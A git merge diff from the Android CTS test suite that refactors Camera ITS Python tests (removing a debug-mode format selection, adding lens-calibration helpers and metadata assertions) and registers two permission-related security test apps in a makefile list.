Merge "CP: Add EGL extensions to graphics device info" into nougat-cts-dev
am: 0f9f0a94ad
Change-Id: I656e48e7a1517dddc66e1b323136bed19e38bc0b
diff --git a/OldCtsTestCaseList.mk b/OldCtsTestCaseList.mk
index 685d9a0..c54d283 100644
--- a/OldCtsTestCaseList.mk
+++ b/OldCtsTestCaseList.mk
@@ -15,9 +15,11 @@
cts_security_apps_list := \
CtsAppAccessData \
CtsAppWithData \
+ CtsDeclareNonRuntimePermissions \
CtsDocumentProvider \
CtsDocumentClient \
CtsEncryptionApp \
+ CtsEscalateToRuntimePermissions \
CtsExternalStorageApp \
CtsInstrumentationAppDiffCert \
CtsNetSecPolicyUsesCleartextTrafficFalse \
diff --git a/apps/CameraITS/pymodules/its/caps.py b/apps/CameraITS/pymodules/its/caps.py
index 10586ea..d9270f7 100644
--- a/apps/CameraITS/pymodules/its/caps.py
+++ b/apps/CameraITS/pymodules/its/caps.py
@@ -395,16 +395,56 @@
in props["android.edge.availableEdgeModes"];
-def debug_mode():
- """Returns True/False for whether test is run in debug mode.
+def lens_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
Returns:
Boolean.
"""
- for s in sys.argv[1:]:
- if s[:6] == "debug=" and s[6:] == "True":
- return True
- return False
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ props["android.lens.info.focusDistanceCalibration"] == 2
+
+
+def lens_approx_calibrated(props):
+ """Returns whether lens position is calibrated or not.
+
+ android.lens.info.focusDistanceCalibration has 3 modes.
+ 0: Uncalibrated
+ 1: Approximate
+ 2: Calibrated
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.focusDistanceCalibration") and \
+ (props["android.lens.info.focusDistanceCalibration"] == 1 or
+ props["android.lens.info.focusDistanceCalibration"] == 2)
+
+
+def fixed_focus(props):
+ """Returns whether a device is fixed focus.
+
+ props[android.lens.info.minimumFocusDistance] == 0 is fixed focus
+
+ Args:
+ props: Camera properties objects.
+
+ Returns:
+ Boolean.
+ """
+ return props.has_key("android.lens.info.minimumFocusDistance") and \
+ props["android.lens.info.minimumFocusDistance"] == 0
class __UnitTest(unittest.TestCase):
diff --git a/apps/CameraITS/pymodules/its/image.py b/apps/CameraITS/pymodules/its/image.py
index a5ac60b..f1539ba 100644
--- a/apps/CameraITS/pymodules/its/image.py
+++ b/apps/CameraITS/pymodules/its/image.py
@@ -18,7 +18,7 @@
import its.error
import pylab
import sys
-import Image
+from PIL import Image
import numpy
import math
import unittest
diff --git a/apps/CameraITS/pymodules/its/objects.py b/apps/CameraITS/pymodules/its/objects.py
index 9a68ac2..b2a49aa 100644
--- a/apps/CameraITS/pymodules/its/objects.py
+++ b/apps/CameraITS/pymodules/its/objects.py
@@ -262,39 +262,6 @@
return req, out_spec
-
-def get_smallest_yuv_format(props, match_ar=None):
- """Return a capture request and format spec for the smallest yuv size.
-
- Args:
- props: the object returned from its.device.get_camera_properties().
-
- Returns:
- fmt: an output format specification, for the smallest possible yuv
- format for this device.
- """
- size = get_available_output_sizes("yuv", props, match_ar_size=match_ar)[-1]
- fmt = {"format":"yuv", "width":size[0], "height":size[1]}
-
- return fmt
-
-
-def get_largest_yuv_format(props):
- """Return a capture request and format spec for the smallest yuv size.
-
- Args:
- props: the object returned from its.device.get_camera_properties().
-
- Returns:
- fmt: an output format specification, for the smallest possible yuv
- format for this device.
- """
- size = get_available_output_sizes("yuv", props)[0]
- fmt = {"format":"yuv", "width":size[0], "height":size[1]}
-
- return fmt
-
-
def get_max_digital_zoom(props):
"""Returns the maximum amount of zooming possible by the camera device.
diff --git a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
index 8f4682a..df904aa 100644
--- a/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
+++ b/apps/CameraITS/tests/dng_noise_model/dng_noise_model.py
@@ -21,7 +21,6 @@
import matplotlib
import matplotlib.pyplot as plt
import math
-import Image
import time
import numpy as np
import scipy.stats
@@ -157,7 +156,7 @@
np.var(tile(hp, tile_size), axis=(0, 1)).flatten()
for (mean, var) in zip(means_tiled, vars_tiled):
- # Don't include the tile if it has samples that might
+ # Don't include the tile if it has samples that might
# be clipped.
if mean + 2*math.sqrt(var) < max_signal_level:
samples_e.append([mean, var])
@@ -175,7 +174,7 @@
samples.extend([(round(s), mean, var) for (mean, var) in samples_s])
# Add the linear fit to the plot for this sensitivity.
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'r-',
label="Linear fit")
xmax = max([x for (x, _) in samples_s])*1.25
plt_s.set_xlim(xmin=0, xmax=xmax)
@@ -219,7 +218,7 @@
[A, B, C, D], _, _, _ = np.linalg.lstsq(a, b)
- # Plot the noise model components with the values predicted by the
+ # Plot the noise model components with the values predicted by the
# noise model.
S_model = A*sens + B
O_model = \
@@ -228,14 +227,14 @@
(fig, (plt_S, plt_O)) = plt.subplots(2, 1)
plt_S.set_title("Noise model")
plt_S.set_ylabel("S")
- plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
+ plt_S.loglog(sens, S_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_S.loglog(sens, S_model, 'bx', basex=10, basey=10, label="Model")
plt_S.legend(loc=2)
plt_O.set_xlabel("ISO")
plt_O.set_ylabel("O")
- plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
+ plt_O.loglog(sens, O_measured, 'r+', basex=10, basey=10,
label="Measured")
plt_O.loglog(sens, O_model, 'bx', basex=10, basey=10, label="Model")
fig.savefig("%s.png" % (NAME))
@@ -246,7 +245,7 @@
dg = max(s/sens_max_analog, 1)
S = A*s + B
O = C*s*s + D*dg*dg
- plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
+ plt_s.plot([0, max_signal_level], [O, O + S*max_signal_level], 'b-',
label="Model")
plt_s.legend(loc=2)
diff --git a/apps/CameraITS/tests/scene0/test_metadata.py b/apps/CameraITS/tests/scene0/test_metadata.py
index 94f0412..e5fbba5 100644
--- a/apps/CameraITS/tests/scene0/test_metadata.py
+++ b/apps/CameraITS/tests/scene0/test_metadata.py
@@ -77,6 +77,34 @@
assert(not failed)
+ if not its.caps.legacy(props):
+ # Test: pixel_pitch, FOV, and hyperfocal distance are reasonable
+ fmts = props["android.scaler.streamConfigurationMap"]["availableStreamConfigurations"]
+ fmts = sorted(fmts, key=lambda k: k["width"]*k["height"], reverse=True)
+ sensor_size = props["android.sensor.info.physicalSize"]
+ pixel_pitch_h = (sensor_size["height"] / fmts[0]["height"] * 1E3)
+ pixel_pitch_w = (sensor_size["width"] / fmts[0]["width"] * 1E3)
+ print "Assert pixel_pitch WxH: %.2f um, %.2f um" % (pixel_pitch_w,
+ pixel_pitch_h)
+ assert 1.0 <= pixel_pitch_w <= 10
+ assert 1.0 <= pixel_pitch_h <= 10
+ assert 0.333 <= pixel_pitch_w/pixel_pitch_h <= 3.0
+
+ diag = math.sqrt(sensor_size["height"] ** 2 +
+ sensor_size["width"] ** 2)
+ fl = md["android.lens.focalLength"]
+ fov = 2 * math.degrees(math.atan(diag / (2 * fl)))
+ print "Assert field of view: %.1f degrees" % fov
+ assert 30 <= fov <= 130
+
+ if its.caps.lens_approx_calibrated(props):
+ diopter_hyperfocal = props["android.lens.info.hyperfocalDistance"]
+ if diopter_hyperfocal != 0.0:
+ hyperfocal = 1.0 / diopter_hyperfocal
+ print "Assert hyperfocal distance: %.2f m" % hyperfocal
+ assert 0.02 <= hyperfocal
+
+
def getval(expr, default=None):
try:
return eval(expr)
diff --git a/apps/CameraITS/tests/scene1/test_auto_vs_manual.py b/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
index 58d4bdf..a9efa0b 100644
--- a/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
+++ b/apps/CameraITS/tests/scene1/test_auto_vs_manual.py
@@ -37,13 +37,6 @@
its.caps.per_frame_control(props))
# Converge 3A and get the estimates.
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
sens, exp, gains, xform, focus = cam.do_3a(get_results=True)
xform_rat = its.objects.float_to_rational(xform)
print "AE sensitivity %d, exposure %dms" % (sens, exp/1000000.0)
@@ -53,7 +46,7 @@
# Auto capture.
req = its.objects.auto_capture_request()
- cap_auto = cam.do_capture(req, fmt)
+ cap_auto = cam.do_capture(req)
img_auto = its.image.convert_capture_to_rgb_image(cap_auto)
its.image.write_image(img_auto, "%s_auto.jpg" % (NAME))
xform_a = its.objects.rational_to_float(
@@ -66,7 +59,7 @@
req = its.objects.manual_capture_request(sens, exp)
req["android.colorCorrection.transform"] = xform_rat
req["android.colorCorrection.gains"] = gains
- cap_man1 = cam.do_capture(req, fmt)
+ cap_man1 = cam.do_capture(req)
img_man1 = its.image.convert_capture_to_rgb_image(cap_man1)
its.image.write_image(img_man1, "%s_manual_wb.jpg" % (NAME))
xform_m1 = its.objects.rational_to_float(
@@ -81,7 +74,7 @@
req["android.tonemap.curveRed"] = gamma
req["android.tonemap.curveGreen"] = gamma
req["android.tonemap.curveBlue"] = gamma
- cap_man2 = cam.do_capture(req, fmt)
+ cap_man2 = cam.do_capture(req)
img_man2 = its.image.convert_capture_to_rgb_image(cap_man2)
its.image.write_image(img_man2, "%s_manual_wb_tm.jpg" % (NAME))
xform_m2 = its.objects.rational_to_float(
diff --git a/apps/CameraITS/tests/scene1/test_black_white.py b/apps/CameraITS/tests/scene1/test_black_white.py
index e2de71e..68d7de6 100644
--- a/apps/CameraITS/tests/scene1/test_black_white.py
+++ b/apps/CameraITS/tests/scene1/test_black_white.py
@@ -35,14 +35,6 @@
its.caps.skip_unless(its.caps.manual_sensor(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
expt_range = props['android.sensor.info.exposureTimeRange']
sens_range = props['android.sensor.info.sensitivityRange']
@@ -51,7 +43,7 @@
print "Black shot: sens = %d, exp time = %.4fms" % (
sens_range[0], expt_range[0]/1000000.0)
req = its.objects.manual_capture_request(sens_range[0], expt_range[0])
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_black.jpg" % (NAME))
tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
@@ -66,7 +58,7 @@
print "White shot: sens = %d, exp time = %.2fms" % (
sens_range[1], expt_range[1]/1000000.0)
req = its.objects.manual_capture_request(sens_range[1], expt_range[1])
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_white.jpg" % (NAME))
tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py b/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
index d355cd8..c14f5a9 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_advanced.py
@@ -41,14 +41,6 @@
its.caps.per_frame_control(props) and
its.caps.ev_compensation(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
ev_compensation_range = props['android.control.aeCompensationRange']
range_min = ev_compensation_range[0]
range_max = ev_compensation_range[1]
@@ -77,7 +69,7 @@
req["android.tonemap.curveRed"] = [0.0,0.0, 1.0,1.0]
req["android.tonemap.curveGreen"] = [0.0,0.0, 1.0,1.0]
req["android.tonemap.curveBlue"] = [0.0,0.0, 1.0,1.0]
- caps = cam.do_capture([req]*THREASH_CONVERGE_FOR_EV, fmt)
+ caps = cam.do_capture([req]*THREASH_CONVERGE_FOR_EV)
for cap in caps:
if (cap['metadata']['android.control.aeState'] == LOCKED):
diff --git a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
index 9992667..cb69607 100644
--- a/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
+++ b/apps/CameraITS/tests/scene1/test_ev_compensation_basic.py
@@ -41,14 +41,6 @@
its.caps.skip_unless(its.caps.ev_compensation(props) and
its.caps.ae_lock(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
ev_per_step = its.objects.rational_to_float(
props['android.control.aeCompensationStep'])
steps_per_ev = int(1.0 / ev_per_step)
@@ -69,7 +61,7 @@
req = its.objects.auto_capture_request()
req['android.control.aeExposureCompensation'] = ev
req["android.control.aeLock"] = True
- caps = cam.do_capture([req]*THRESH_CONVERGE_FOR_EV, fmt)
+ caps = cam.do_capture([req]*THRESH_CONVERGE_FOR_EV)
for cap in caps:
if (cap['metadata']['android.control.aeState'] == LOCKED):
y = its.image.convert_capture_to_planes(cap)[0]
diff --git a/apps/CameraITS/tests/scene1/test_exposure.py b/apps/CameraITS/tests/scene1/test_exposure.py
index e5c23c8..a70f357 100644
--- a/apps/CameraITS/tests/scene1/test_exposure.py
+++ b/apps/CameraITS/tests/scene1/test_exposure.py
@@ -51,14 +51,6 @@
its.caps.skip_unless(its.caps.compute_target_exposure(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e,s = its.target.get_target_exposure_combos(cam)["minSensitivity"]
s_e_product = s*e
expt_range = props['android.sensor.info.exposureTimeRange']
@@ -70,9 +62,8 @@
s_test = round(s*m)
e_test = s_e_product / s_test
print "Testing s:", s_test, "e:", e_test
- req = its.objects.manual_capture_request(
- s_test, e_test, True, props)
- cap = cam.do_capture(req, fmt)
+ req = its.objects.manual_capture_request(s_test, e_test, True, props)
+ cap = cam.do_capture(req)
s_res = cap["metadata"]["android.sensor.sensitivity"]
e_res = cap["metadata"]["android.sensor.exposureTime"]
assert(0 <= s_test - s_res < s_test * THRESHOLD_ROUND_DOWN_GAIN)
diff --git a/apps/CameraITS/tests/scene1/test_format_combos.py b/apps/CameraITS/tests/scene1/test_format_combos.py
index 1519237..1b40826 100644
--- a/apps/CameraITS/tests/scene1/test_format_combos.py
+++ b/apps/CameraITS/tests/scene1/test_format_combos.py
@@ -38,7 +38,6 @@
successes = []
failures = []
- debug = its.caps.debug_mode()
# Two different requests: auto, and manual.
e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
@@ -90,8 +89,7 @@
for c,cap in enumerate(caps):
img = its.image.convert_capture_to_rgb_image(cap,
props=props)
- if debug:
- its.image.write_image(img,
+ its.image.write_image(img,
"%s_n%02d_r%d_f%d_b%d_c%d.jpg"%(NAME,n,r,f,b,c))
except Exception as e:
diff --git a/apps/CameraITS/tests/scene1/test_linearity.py b/apps/CameraITS/tests/scene1/test_linearity.py
index 9de1af3..2176f5e 100644
--- a/apps/CameraITS/tests/scene1/test_linearity.py
+++ b/apps/CameraITS/tests/scene1/test_linearity.py
@@ -50,14 +50,6 @@
its.caps.skip_unless(its.caps.compute_target_exposure(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e,s = its.target.get_target_exposure_combos(cam)["midSensitivity"]
s /= 2
sens_range = props['android.sensor.info.sensitivityRange']
@@ -78,7 +70,7 @@
for sens in sensitivities:
req["android.sensor.sensitivity"] = sens
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(
img, "%s_sens=%04d.jpg" % (NAME, sens))
diff --git a/apps/CameraITS/tests/scene1/test_locked_burst.py b/apps/CameraITS/tests/scene1/test_locked_burst.py
index 5308010..daefb6b 100644
--- a/apps/CameraITS/tests/scene1/test_locked_burst.py
+++ b/apps/CameraITS/tests/scene1/test_locked_burst.py
@@ -44,8 +44,6 @@
# Converge 3A prior to capture.
cam.do_3a(do_af=True, lock_ae=True, lock_awb=True)
- fmt = its.objects.get_largest_yuv_format(props)
-
# After 3A has converged, lock AE+AWB for the duration of the test.
req = its.objects.fastest_auto_capture_request(props)
req["android.control.awbLock"] = True
@@ -56,7 +54,7 @@
r_means = []
g_means = []
b_means = []
- caps = cam.do_capture([req]*BURST_LEN, fmt)
+ caps = cam.do_capture([req]*BURST_LEN)
for i,cap in enumerate(caps):
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_frame%d.jpg"%(NAME,i))
diff --git a/apps/CameraITS/tests/scene1/test_param_color_correction.py b/apps/CameraITS/tests/scene1/test_param_color_correction.py
index 86ea708..09b3707 100644
--- a/apps/CameraITS/tests/scene1/test_param_color_correction.py
+++ b/apps/CameraITS/tests/scene1/test_param_color_correction.py
@@ -41,14 +41,6 @@
its.caps.per_frame_control(props))
# Baseline request
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e, s = its.target.get_target_exposure_combos(cam)["midSensitivity"]
req = its.objects.manual_capture_request(s, e, True, props)
req["android.colorCorrection.mode"] = 0
@@ -78,7 +70,7 @@
for i in range(len(transforms)):
req["android.colorCorrection.transform"] = transforms[i]
req["android.colorCorrection.gains"] = gains[i]
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_req=%d.jpg" % (NAME, i))
tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene1/test_param_exposure_time.py b/apps/CameraITS/tests/scene1/test_param_exposure_time.py
index e77119f..0c0aab1 100644
--- a/apps/CameraITS/tests/scene1/test_param_exposure_time.py
+++ b/apps/CameraITS/tests/scene1/test_param_exposure_time.py
@@ -37,18 +37,10 @@
its.caps.skip_unless(its.caps.compute_target_exposure(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e,s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
for i,e_mult in enumerate([0.8, 0.9, 1.0, 1.1, 1.2]):
req = its.objects.manual_capture_request(s, e * e_mult, True, props)
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(
img, "%s_frame%d.jpg" % (NAME, i))
diff --git a/apps/CameraITS/tests/scene1/test_param_flash_mode.py b/apps/CameraITS/tests/scene1/test_param_flash_mode.py
index 9a87b88..38f864f 100644
--- a/apps/CameraITS/tests/scene1/test_param_flash_mode.py
+++ b/apps/CameraITS/tests/scene1/test_param_flash_mode.py
@@ -37,21 +37,13 @@
# Manually set the exposure to be a little on the dark side, so that
# it should be obvious whether the flash fired or not, and use a
# linear tonemap.
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
e /= 4
req = its.objects.manual_capture_request(s, e, True, props)
for f in [0,1,2]:
req["android.flash.mode"] = f
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
flash_modes_reported.append(cap["metadata"]["android.flash.mode"])
flash_states_reported.append(cap["metadata"]["android.flash.state"])
img = its.image.convert_capture_to_rgb_image(cap)
diff --git a/apps/CameraITS/tests/scene1/test_param_sensitivity.py b/apps/CameraITS/tests/scene1/test_param_sensitivity.py
index 32b764d..d6b44a2 100644
--- a/apps/CameraITS/tests/scene1/test_param_sensitivity.py
+++ b/apps/CameraITS/tests/scene1/test_param_sensitivity.py
@@ -39,14 +39,6 @@
its.caps.skip_unless(its.caps.compute_target_exposure(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
expt,_ = its.target.get_target_exposure_combos(cam)["midSensitivity"]
sens_range = props['android.sensor.info.sensitivityRange']
sens_step = (sens_range[1] - sens_range[0]) / float(NUM_STEPS-1)
@@ -54,7 +46,7 @@
for s in sensitivities:
req = its.objects.manual_capture_request(s, expt)
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(
img, "%s_iso=%04d.jpg" % (NAME, s))
diff --git a/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py b/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
index 1229f90..8c8e626 100644
--- a/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
+++ b/apps/CameraITS/tests/scene1/test_param_tonemap_mode.py
@@ -41,14 +41,6 @@
its.caps.skip_unless(its.caps.compute_target_exposure(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
e, s = its.target.get_target_exposure_combos(cam)["midExposureTime"]
e /= 2
@@ -68,7 +60,7 @@
sum([[i/LM1, min(1.0,(1+1.0*n)*i/LM1)] for i in range(L)], []))
req["android.tonemap.curveBlue"] = (
sum([[i/LM1, min(1.0,(1+1.5*n)*i/LM1)] for i in range(L)], []))
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(
img, "%s_n=%d.jpg" %(NAME, n))
diff --git a/apps/CameraITS/tests/scene1/test_tonemap_sequence.py b/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
index 465ef30..54d3d65 100644
--- a/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
+++ b/apps/CameraITS/tests/scene1/test_tonemap_sequence.py
@@ -26,7 +26,7 @@
# There should be 3 identical frames followed by a different set of
# 3 identical frames.
- MAX_SAME_DELTA = 0.03 # match number in test_burst_sameness_manual
+ MAX_SAME_DELTA = 0.015
MIN_DIFF_DELTA = 0.10
with its.device.ItsSession() as cam:
@@ -35,22 +35,14 @@
its.caps.manual_post_proc(props) and
its.caps.per_frame_control(props))
- debug = its.caps.debug_mode()
- largest_yuv = its.objects.get_largest_yuv_format(props)
- if debug:
- fmt = largest_yuv
- else:
- match_ar = (largest_yuv['width'], largest_yuv['height'])
- fmt = its.objects.get_smallest_yuv_format(props, match_ar=match_ar)
-
- sens, exp_time, _,_,f_dist = cam.do_3a(do_af=True,get_results=True)
+ sens, exp_time, _,_,_ = cam.do_3a(do_af=False,get_results=True)
means = []
# Capture 3 manual shots with a linear tonemap.
req = its.objects.manual_capture_request(sens, exp_time, True, props)
for i in [0,1,2]:
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_i=%d.jpg" % (NAME, i))
tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
@@ -59,7 +51,7 @@
# Capture 3 manual shots with the default tonemap.
req = its.objects.manual_capture_request(sens, exp_time, False)
for i in [3,4,5]:
- cap = cam.do_capture(req, fmt)
+ cap = cam.do_capture(req)
img = its.image.convert_capture_to_rgb_image(cap)
its.image.write_image(img, "%s_i=%d.jpg" % (NAME, i))
tile = its.image.get_image_patch(img, 0.45, 0.45, 0.1, 0.1)
diff --git a/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py b/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
index 9642061..8ff7f73 100644
--- a/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
+++ b/apps/CameraITS/tests/scene4/test_aspect_ratio_and_crop.py
@@ -77,7 +77,6 @@
run_crop_test = (level3_device or full_device) and raw_avlb
if not run_crop_test:
print "Crop test skipped"
- debug = its.caps.debug_mode()
# Converge 3A and get the estimates.
sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
lock_ae=True, lock_awb=True)
@@ -105,8 +104,7 @@
img_name = "%s_%s_w%d_h%d.png" \
% (NAME, "raw", size_raw[1], size_raw[0])
aspect_ratio_gt, cc_ct_gt, circle_size_raw = measure_aspect_ratio(
- img_raw, 1, img_name,
- debug)
+ img_raw, 1, img_name)
# Normalize the circle size to 1/4 of the image size, so that
# circle size won"t affect the crop test result
factor_cp_thres = (min(size_raw[0:1])/4.0) / max(circle_size_raw)
@@ -156,9 +154,8 @@
img = its.image.convert_capture_to_rgb_image(frm_iter)
img_name = "%s_%s_with_%s_w%d_h%d.png" \
% (NAME, fmt_iter, fmt_cmpr, w_iter, h_iter)
- aspect_ratio, cc_ct, (cc_w, cc_h) = \
- measure_aspect_ratio(img, raw_avlb, img_name,
- debug)
+ aspect_ratio, cc_ct, _ = measure_aspect_ratio(img, raw_avlb,
+ img_name)
# check pass/fail for aspect ratio
# image size >= LARGE_SIZE: use THRES_L_AR_TEST
# image size == 0 (extreme case): THRES_XS_AR_TEST
@@ -237,7 +234,7 @@
assert (failed_image_number_for_crop_test == 0)
-def measure_aspect_ratio(img, raw_avlb, img_name, debug):
+def measure_aspect_ratio(img, raw_avlb, img_name):
""" Measure the aspect ratio of the black circle in the test image.
Args:
@@ -245,7 +242,6 @@
raw_avlb: True: raw capture is available; False: raw capture is not
available.
img_name: string with image info of format and size.
- debug: boolean for whether in debug mode.
Returns:
aspect_ratio: aspect ratio number in float.
cc_ct: circle center position relative to the center of image.
@@ -375,8 +371,7 @@
cv2.putText(img, "image center", (text_imgct_x, text_imgct_y),
cv2.FONT_HERSHEY_SIMPLEX, line_width/2.0, (255, 0, 0),
line_width)
- if debug:
- its.image.write_image(img/255, img_name, True)
+ its.image.write_image(img/255, img_name, True)
print "Aspect ratio: %.3f" % aspect_ratio
print "Circle center position regarding to image center: %.3fx%.3f" % \
diff --git a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
index a26889b..065f854 100644
--- a/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
+++ b/apps/CameraITS/tests/scene5/test_lens_shading_and_color_uniformity.py
@@ -52,16 +52,16 @@
with its.device.ItsSession() as cam:
props = cam.get_camera_properties()
- its.caps.skip_unless(its.caps.read_3a(props))
- # Converge 3A and get the estimates.
- sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
- do_af=False,
- lock_ae=True,
- lock_awb=True)
- print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
- print "AWB gains", gains
- print "AWB transform", xform
- print "AF distance", focus
+ if its.caps.read_3a(props):
+ # Converge 3A and get the estimates.
+ sens, exp, gains, xform, focus = cam.do_3a(get_results=True,
+ do_af=False,
+ lock_ae=True,
+ lock_awb=True)
+ print "AE sensitivity %d, exposure %dms" % (sens, exp / 1000000.0)
+ print "AWB gains", gains
+ print "AWB transform", xform
+ print "AF distance", focus
req = its.objects.auto_capture_request()
img_size = its.objects.get_available_output_sizes("yuv", props)
w = img_size[0][0]
diff --git a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
index 288d6e4..bbd1417 100644
--- a/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
+++ b/apps/CameraITS/tests/sensor_fusion/test_sensor_fusion.py
@@ -23,7 +23,7 @@
import matplotlib
import matplotlib.pyplot
import json
-import Image
+from PIL import Image
import numpy
import cv2
import bisect
diff --git a/apps/CtsVerifier/AndroidManifest.xml b/apps/CtsVerifier/AndroidManifest.xml
index 50fd538..475a95b 100644
--- a/apps/CtsVerifier/AndroidManifest.xml
+++ b/apps/CtsVerifier/AndroidManifest.xml
@@ -18,7 +18,7 @@
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.android.cts.verifier"
android:versionCode="5"
- android:versionName="7.0_r8">
+ android:versionName="7.0_r0">
